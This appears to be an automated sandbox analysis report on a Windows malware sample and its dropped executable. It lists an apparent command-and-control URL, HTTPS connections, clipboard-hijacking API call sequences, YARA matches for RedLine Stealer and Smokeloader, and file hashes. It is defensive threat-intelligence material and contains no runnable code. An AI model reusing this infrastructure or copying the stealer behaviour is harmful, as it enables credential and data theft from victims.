Source: B4A1.tmp.exe, 00000001.00000003.1815832808.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1815832808.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1870216375.0000000003208000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000002.2189574857.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1866827479.0000000003204000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1866981043.0000000003205000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/api
Source: B4A1.tmp.exe, 00000001.00000003.1841226033.0000000003207000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/apikXuSc
Source: B4A1.tmp.exe, 00000001.00000003.1842793116.0000000003208000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1841493155.0000000003208000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1841226033.0000000003207000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1843781600.0000000003204000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/apireW08D
Source: B4A1.tmp.exe, 00000001.00000002.2190349192.00000000031F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/i
Source: B4A1.tmp.exe, 00000001.00000003.1815897318.00000000009A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/mN
Source: B4A1.tmp.exe, 00000001.00000003.1817192653.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: B4A1.tmp.exe, 00000001.00000003.1870293366.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: B4A1.tmp.exe, 00000001.00000003.1870293366.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: B4A1.tmp.exe, 00000001.00000003.1817285513.000000000324F000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1817192653.0000000003256000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1841093343.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: B4A1.tmp.exe, 00000001.00000003.1817285513.000000000322A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: B4A1.tmp.exe, 00000001.00000003.1817285513.000000000324F000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1817192653.0000000003256000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1841093343.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: B4A1.tmp.exe, 00000001.00000003.1817285513.000000000322A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: B4A1.tmp.exe, 00000001.00000003.1870293366.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: B4A1.tmp.exe, 00000001.00000003.1870293366.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: B4A1.tmp.exe, 00000001.00000003.1870293366.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: B4A1.tmp.exe, 00000001.00000003.1870293366.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: B4A1.tmp.exe, 00000001.00000003.1870293366.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.24.223:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.24.223:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.24.223:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.24.223:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.24.223:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02531942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_02531942

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

0_2_004016DF

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.2189547236.000000000095A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.4130558375.0000000000B4A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02532361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_02532361
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02532605 NtdllDefWindowProc_W,PostQuitMessage,		0_2_02532605

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00428022	0_2_00428022
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_004071AB	0_2_004071AB
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_004373D9	0_2_004373D9
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0042D4EE	0_2_0042D4EE
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00427484	0_2_00427484
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00428560	0_2_00428560
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_004166AF	0_2_004166AF
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00413725	0_2_00413725
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_004277F6	0_2_004277F6
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0040E974	0_2_0040E974
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0042EAE0	0_2_0042EAE0
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00427AA0	0_2_00427AA0
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00418AAF	0_2_00418AAF
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00436CBF	0_2_00436CBF
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00427D67	0_2_00427D67
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00413F0B	0_2_00413F0B
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02558289	0_2_02558289
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0255ED47	0_2_0255ED47
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02544172	0_2_02544172
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_025576EB	0_2_025576EB
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0255D755	0_2_0255D755
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_025587C7	0_2_025587C7
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02557A5D	0_2_02557A5D
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0253EBDB	0_2_0253EBDB
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02546916	0_2_02546916
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0254398C	0_2_0254398C
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02566F26	0_2_02566F26
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02557FCE	0_2_02557FCE
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0255ED47	0_2_0255ED47
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02548D16	0_2_02548D16
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02557D07	0_2_02557D07
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00408850	1_2_00408850
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004218A0	1_2_004218A0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00422190	1_2_00422190
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00437DF0	1_2_00437DF0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004096C1	1_2_004096C1
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00415799	1_2_00415799
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00423860	1_2_00423860
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00438810	1_2_00438810
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0041682D	1_2_0041682D
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004288CB	1_2_004288CB
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043D880	1_2_0043D880
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00430940	1_2_00430940
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00403970	1_2_00403970
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00420939	1_2_00420939
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004179C1	1_2_004179C1
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004231C2	1_2_004231C2
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004241C0	1_2_004241C0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043B1D0	1_2_0043B1D0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004291DD	1_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043D980	1_2_0043D980
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00405990	1_2_00405990
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043D997	1_2_0043D997
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043D999	1_2_0043D999
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004091B0	1_2_004091B0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0042CA49	1_2_0042CA49
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0042DA53	1_2_0042DA53
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00416263	1_2_00416263
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0040EA10	1_2_0040EA10
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00415220	1_2_00415220
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0042CAD0	1_2_0042CAD0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004252DD	1_2_004252DD
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0041B2E0	1_2_0041B2E0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00406280	1_2_00406280
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043DA80	1_2_0043DA80
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0041E290	1_2_0041E290
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0041CB40	1_2_0041CB40
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043D34D	1_2_0043D34D
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00426B50	1_2_00426B50
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043DB60	1_2_0043DB60
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00436B08	1_2_00436B08
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0042830D	1_2_0042830D
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0042CB11	1_2_0042CB11
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00404320	1_2_00404320
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0042CB22	1_2_0042CB22
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00425327	1_2_00425327
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00408330	1_2_00408330
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043F330	1_2_0043F330
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0042A33F	1_2_0042A33F
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0040DBD9	1_2_0040DBD9
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00424380	1_2_00424380
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0041FC75	1_2_0041FC75
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0041DC00	1_2_0041DC00
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00429C2B	1_2_00429C2B
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004291DD	1_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004074F0	1_2_004074F0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0040ACF0	1_2_0040ACF0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0041148F	1_2_0041148F
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0042AC90	1_2_0042AC90
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043ECA0	1_2_0043ECA0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0040CD46	1_2_0040CD46
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00437500	1_2_00437500
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00422510	1_2_00422510
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00417DEE	1_2_00417DEE
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00409580	1_2_00409580
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0041759F	1_2_0041759F
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00425E70	1_2_00425E70
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00436E74	1_2_00436E74
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00427603	1_2_00427603
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00425E30	1_2_00425E30
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004286C0	1_2_004286C0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043AEC0	1_2_0043AEC0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004266D0	1_2_004266D0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004236E2	1_2_004236E2
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00405EE0	1_2_00405EE0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0041DE80	1_2_0041DE80
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00402F50	1_2_00402F50
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00420F50	1_2_00420F50
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00438F59	1_2_00438F59
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00406710	1_2_00406710
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00423F20	1_2_00423F20
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043F720	1_2_0043F720
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00419F30	1_2_00419F30
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0041E7C0	1_2_0041E7C0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004197C2	1_2_004197C2
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0042DFE9	1_2_0042DFE9
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0040A780	1_2_0040A780
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00411F90	1_2_00411F90
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00418792	1_2_00418792
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043EFB0	1_2_0043EFB0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024DE250	1_2_024DE250
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024E8A77	1_2_024E8A77
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024EF217	1_2_024EF217
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024C9A29	1_2_024C9A29
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024CEA27	1_2_024CEA27
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024CD230	1_2_024CD230
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024B8AB7	1_2_024B8AB7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D1B07	1_2_024D1B07
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024B3BD7	1_2_024B3BD7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D23F7	1_2_024D23F7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024B5BF7	1_2_024B5BF7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024E0BA7	1_2_024E0BA7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D0BA0	1_2_024D0BA0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024E8057	1_2_024E8057
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024C8055	1_2_024C8055
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024C7806	1_2_024C7806
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024E70DB	1_2_024E70DB
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D60D7	1_2_024D60D7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024CE0E7	1_2_024CE0E7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D3166	1_2_024D3166
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024B6977	1_2_024B6977
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024EB127	1_2_024EB127
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D8927	1_2_024D8927
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D6937	1_2_024D6937
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024BA9E7	1_2_024BA9E7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024C21F7	1_2_024C21F7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024EF987	1_2_024EF987
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024CA197	1_2_024CA197
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D11B7	1_2_024D11B7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024BDE40	1_2_024BDE40
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024CDE67	1_2_024CDE67
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024CFEDC	1_2_024CFEDC
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024C16F6	1_2_024C16F6
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024DAEF7	1_2_024DAEF7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D4687	1_2_024D4687
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D5694	1_2_024D5694
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024B7757	1_2_024B7757
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024E7767	1_2_024E7767
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D2777	1_2_024D2777
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024EEF07	1_2_024EEF07
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024C6F35	1_2_024C6F35
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024BCFAD	1_2_024BCFAD
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D9444	1_2_024D9444
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024BEC77	1_2_024BEC77
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024B9417	1_2_024B9417
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024B64E7	1_2_024B64E7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024CE4F7	1_2_024CE4F7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024DDCBC	1_2_024DDCBC
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024DCCB0	1_2_024DCCB0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024CB547	1_2_024CB547
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024E6D6F	1_2_024E6D6F
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024DCD78	1_2_024DCD78
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D351D	1_2_024D351D
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024DCD37	1_2_024DCD37
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024DCD89	1_2_024DCD89
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024B4587	1_2_024B4587
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024EF597	1_2_024EF597
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024B8597	1_2_024B8597

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe 174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe 174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D

